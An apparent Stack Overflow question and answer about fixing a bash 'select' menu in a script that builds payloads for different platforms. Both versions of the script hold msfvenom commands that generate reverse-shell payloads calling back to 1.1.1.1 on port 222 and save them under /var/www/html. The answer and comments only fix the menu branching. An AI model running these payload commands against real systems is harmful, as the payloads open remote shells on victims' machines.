# Multiple choice menu with a command after selecting

Tags: bash, shell

I have a multiple choice menu. Menu in Menu and then Id like to have the script do "whatever" I tell it to after selecting the second option. In this case I am using msfvenom to generate different types of shells. And my last question is, when I choose number 1 it jumps to the right submenu, but however I chose number 2, instead of jumping into "Web Shells" it's still jumping into the first menu.
PS: This works fine, If I don't use Submenu, based on [here](https://askubuntu.com/questions/1705/how-can-i-create-a-select-menu-in-a-shell-script)

```
#!/bin/bash
clear ;
echo 'Choose a Shell type'

select shell in Binaries Web Scripting Shellcode
do
    case $shell in 
    Binaries|Web|Scripting|Shellcode)   
            break
            ;;
    *)
            echo "Invalid Shell" 
            ;;
    esac
done
clear ;
# Binaries Shells
echo 'Now pick a platform based on the number you chose'
select binaries in Linux Windows MacOS
do
    case $binaries in
    Linux|Windows|MacOS)
    # Linux
    msfvenom -a x86 --platform linux -p linux/x86/shell_reverse_tcp LHOST=1.1.1.1 LPORT=222 -b \x00 -f elf -o /var/www/html/lrs_x86
    # Windows
    msfvenom -a x86 --platform linux -p linux/x86/shell_reverse_tcp LHOST=1.1.1.1 LPORT=222 -b \x00 -f elf -o /var/www/html/win_rs_x86
    # MacOS
    msfvenom -p osx/x86/shell_reverse_tcp LHOST=1.1.1.1 LPORT=222 -f macho > shell.macho
            break
            ;;
    *)
            echo "Invalid option"
            ;;
    esac
done
# Web Shells
select web in PHP ASP JSP WAR
do
    case $web in
    PHP|ASP|JSP|WAR)
            break
            ;;
    *)
            echo "Invalid option"
            ;;
    esac
done
```

And if I make this thing to work, Id just keep adding some more later

Answer (score 1):

Added conditional statements 
to solve[

> when I choose number 1 it jumps to the right submenu, but however I
>   chose number 2, instead of jumping into "Web Shells" it's still
>   jumping into the first menu

]

```
#!/bin/bash
clear ;
echo 'Choose a Shell type'
opt=""
select shell in Binaries Web Scripting Shellcode
do
   opt="$shell"
    case $shell in 
    Binaries|Web|Scripting|Shellcode)   
            break
            ;;
    *)
            echo "Invalid Shell" 
            ;;
    esac
echo $shell
done
clear;

if [ "$opt" = "Binaries" ]; then
# Binaries Shells
echo 'Now pick a platform based on the number you chose'
select binaries in Linux Windows MacOS
do
    case $binaries in
    Linux|Windows|MacOS)
    # Linux
    msfvenom -a x86 --platform linux -p linux/x86/shell_reverse_tcp LHOST=1.1.1.1 LPORT=222 -b \x00 -f elf -o /var/www/html/lrs_x86
    # Windows
    msfvenom -a x86 --platform linux -p linux/x86/shell_reverse_tcp LHOST=1.1.1.1 LPORT=222 -b \x00 -f elf -o /var/www/html/win_rs_x86
    # MacOS
    msfvenom -p osx/x86/shell_reverse_tcp LHOST=1.1.1.1 LPORT=222 -f macho > shell.macho
            break
            ;;
    *)
            echo "Invalid option"
            ;;
    esac
done
clear;

fi

if [ "$opt" = "Web" ] || [ "$opt" = "Binaries" ]; then
# Web Shells
select web in PHP ASP JSP WAR
do
    case $web in
    PHP|ASP|JSP|WAR)
            break
            ;;
    *)
            echo "Invalid option"
            ;;
    esac
done
clear;

fi
```

> Suppose if u have lot of options A,B,C,D,E,F and after picking one
>   option , Say C and you want to navigate from there to D ,to E after
>   D , F after E. Instead of using  logical operator multiple
>   times Have a flag set to true from the selected option

```
#!/bin/bash
clear ;
echo 'Choose a Shell type'
opt=""
flag=false
```

E.g,

```
if [ "$opt" = "Web" ] || [ "$flag" = true ]; then
flag=true
//your code here
```

Comment: Oh that's awesome, that works well! Thank you. Can I use the same method also for my "msfvenom" options? Let's say in the submenu "1) Binaires" I have 3 options, and depending on the number I will chose from the submenu it will go and take whatever is assigned? Now it's just taking command after command

Comment: Yes it will work  ,                                                                                          e.g, if [ "$binaries" = "MacOS" ]; then
       //your command here
    fi
[Look into elif statements , as u will pick only one out of 3 options]
Thanks

Comment: thank you, that was exactly what I wanted to try :) It worked